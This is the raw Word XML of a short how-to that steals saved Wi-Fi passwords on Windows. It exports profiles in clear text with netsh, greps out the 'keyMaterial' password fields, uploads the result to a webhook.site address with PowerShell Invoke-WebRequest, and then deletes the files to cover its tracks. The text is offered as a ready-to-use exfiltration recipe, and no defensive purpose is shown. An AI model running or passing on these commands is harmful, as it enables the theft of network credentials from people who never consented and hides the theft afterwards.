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1E98" w14:textId="5C2E1990" w:rsidR="006D708B" w:rsidRDefault="00785BAB">
      <w:r w:rsidRPr="00785BAB">
        <w:t>netsh wlan export profile key=clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F978D30" w14:textId="0E93E143" w:rsidR="003C6DE0" w:rsidRDefault="003C6DE0">
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3575B8" w14:textId="3A6D9E52" w:rsidR="003C6DE0" w:rsidRDefault="00F40C80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5F78C6" wp14:editId="3B70ACFA">
            <wp:extent cx="5943600" cy="111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BED9" w14:textId="7DC1B355" w:rsidR="003C6DE0" w:rsidRDefault="001F688C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DB0E612" wp14:editId="2BF5E2FC">
            <wp:extent cx="5943600" cy="488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EF4" w14:textId="0D898FD9" w:rsidR="00A97FC2" w:rsidRDefault="00A97FC2"/>
    <w:p w14:paraId="71603D10" w14:textId="22DD8E80" w:rsidR="00A97FC2" w:rsidRDefault="00A97FC2"/>
    <w:p w14:paraId="28B09054" w14:textId="189DB977" w:rsidR="00A96BD1" w:rsidRDefault="00A96BD1"/>
    <w:p w14:paraId="26B413DB" w14:textId="77777777" w:rsidR="00875318" w:rsidRDefault="00875318"/>
    <w:p w14:paraId="49F2AB00" w14:textId="45534613" w:rsidR="00C120A4" w:rsidRDefault="00C120A4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In XML file…password is stored under ‘keyMaterial’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7F6398" w14:textId="7FCF3DC9" w:rsidR="00C120A4" w:rsidRDefault="00C120A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C823E08" wp14:editId="57F23FDF">
            <wp:extent cx="5943600" cy="444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0E1F" w14:textId="3C4C8837" w:rsidR="00C120A4" w:rsidRDefault="00C120A4"/>
    <w:p w14:paraId="12D361A9" w14:textId="77777777" w:rsidR="0099053E" w:rsidRDefault="0099053E" w:rsidP="0099053E">
      <w:r w:rsidRPr="00A96BD1">
        <w:t>powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' &gt; Wi-Fi-PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F126E5C" w14:textId="71F2BE33" w:rsidR="00C120A4" w:rsidRDefault="0099053E">
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E69F8" w14:textId="6B8185A6" w:rsidR="000C5F33" w:rsidRDefault="008448F7">
      <w:r>
        <w:t xml:space="preserve">Extracting all passwords and </w:t>
      </w:r>
      <w:r w:rsidR="000B4C64">
        <w:t>Creat</w:t>
      </w:r>
      <w:r w:rsidR="005479D2">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="000B4C64">
        <w:t xml:space="preserve"> a file called Wi-Fi-PASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430A3BC0" w14:textId="1470E263" w:rsidR="00A96BD1" w:rsidRDefault="00A96BD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DD5A017" wp14:editId="4D51EFDD">
            <wp:extent cx="5943600" cy="56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A8D6" w14:textId="4E1E6333" w:rsidR="00080467" w:rsidRDefault="0064098C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED0700B" wp14:editId="494F1D8F">
            <wp:extent cx="5943600" cy="2228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15BA" w14:textId="1D577383" w:rsidR="00080467" w:rsidRDefault="00080467"/>
    <w:p w14:paraId="3EF72EB9" w14:textId="2BC849A6" w:rsidR="006A71E3" w:rsidRDefault="006A71E3"/>
    <w:p w14:paraId="096E8A76" w14:textId="77777777" w:rsidR="006A71E3" w:rsidRDefault="006A71E3"/>
    <w:p w14:paraId="2071C786" w14:textId="4A0FB62C" w:rsidR="00080467" w:rsidRDefault="00080467">
      <w:r w:rsidRPr="00080467">
        <w:t>powershell Invoke-WebRequest -Uri https://webhook.site/</w:t>
      </w:r>
      <w:r w:rsidR="00A317D2">
        <w:t>YourID</w:t>
      </w:r>
      <w:r w:rsidRPr="00080467">
        <w:t xml:space="preserve"> -Method POST -InFile Wi-Fi-PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C570C3" w14:textId="3A98599A" w:rsidR="0044268A" w:rsidRDefault="0044268A">
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="002248F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002248F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53E9AE56" wp14:editId="77EDF3BA">
            <wp:extent cx="5943600" cy="243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F02" w14:textId="2BC20CD6" w:rsidR="00617065" w:rsidRDefault="00617065"/>
    <w:p w14:paraId="4E732E8F" w14:textId="4DCCAF8E" w:rsidR="00617065" w:rsidRDefault="00617065">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1618D07C" wp14:editId="1B372EA1">
            <wp:extent cx="5943600" cy="259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C0A3" w14:textId="4B9258CB" w:rsidR="00496DD9" w:rsidRDefault="00496DD9"/>
    <w:p w14:paraId="48654108" w14:textId="198D6895" w:rsidR="00EA6999" w:rsidRDefault="00EA6999">
      <w:r>
        <w:t>Now clean up mess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F1DB38" w14:textId="7D453872" w:rsidR="00EA6999" w:rsidRDefault="000C5C87">
      <w:r w:rsidRPr="000C5C87">
        <w:t>del Wi-* /s /f /q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E1BA2" w14:textId="08E6FAC9" w:rsidR="00496DD9" w:rsidRDefault="00496DD9"/>
    <w:p w14:paraId="202F97D6" w14:textId="66D14B9C" w:rsidR="00496DD9" w:rsidRDefault="00EA6999">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064E85BA" wp14:editId="0D6CF32F">
            <wp:extent cx="5542857" cy="1028571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503B" w14:textId="77777777" w:rsidR="00A96BD1" w:rsidRDefault="00A96BD1" w:rsidP="00A96BD1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7559AD0F" w14:textId="77777777" w:rsidR="00A96BD1" w:rsidRDefault="00A96BD1" w:rsidP="00A9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1D3C" w14:textId="77777777" w:rsidR="00A96BD1" w:rsidRDefault="00A96BD1" w:rsidP="00A96BD1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5AB268F6" w14:textId="77777777" w:rsidR="00A96BD1" w:rsidRDefault="00A96BD1" w:rsidP="00A96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3307"/>
    <w:rsid w:val="00080467"/>
    <w:rsid w:val="000B4C64"/>
    <w:rsid w:val="000C5C87"/>
    <w:rsid w:val="000C5F33"/>
    <w:rsid w:val="001F688C"/>
    <w:rsid w:val="002248F9"/>
    <w:rsid w:val="0033085E"/>
    <w:rsid w:val="003B0E69"/>
    <w:rsid w:val="003C6DE0"/>
    <w:rsid w:val="0044268A"/>
    <w:rsid w:val="00496DD9"/>
    <w:rsid w:val="005479D2"/>
    <w:rsid w:val="00567FC3"/>
    <w:rsid w:val="00617065"/>
    <w:rsid w:val="0064098C"/>
    <w:rsid w:val="00691ECC"/>
    <w:rsid w:val="006A71E3"/>
    <w:rsid w:val="006D708B"/>
    <w:rsid w:val="00711EBB"/>
    <w:rsid w:val="00757190"/>
    <w:rsid w:val="00785BAB"/>
    <w:rsid w:val="008448F7"/>
    <w:rsid w:val="00875318"/>
    <w:rsid w:val="008A3307"/>
    <w:rsid w:val="0099053E"/>
    <w:rsid w:val="00A317D2"/>
    <w:rsid w:val="00A96BD1"/>
    <w:rsid w:val="00A97FC2"/>
    <w:rsid w:val="00BC717E"/>
    <w:rsid w:val="00C120A4"/>
    <w:rsid w:val="00C51B35"/>
    <w:rsid w:val="00DB5BA3"/>
    <w:rsid w:val="00EA6999"/>
    <w:rsid w:val="00EF6671"/>
    <w:rsid w:val="00F4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C9D3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C76D6469-7B26-41AA-9A73-36D77863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D1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A9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Verma</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aneesh Verma</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-16T18:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-16T19:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>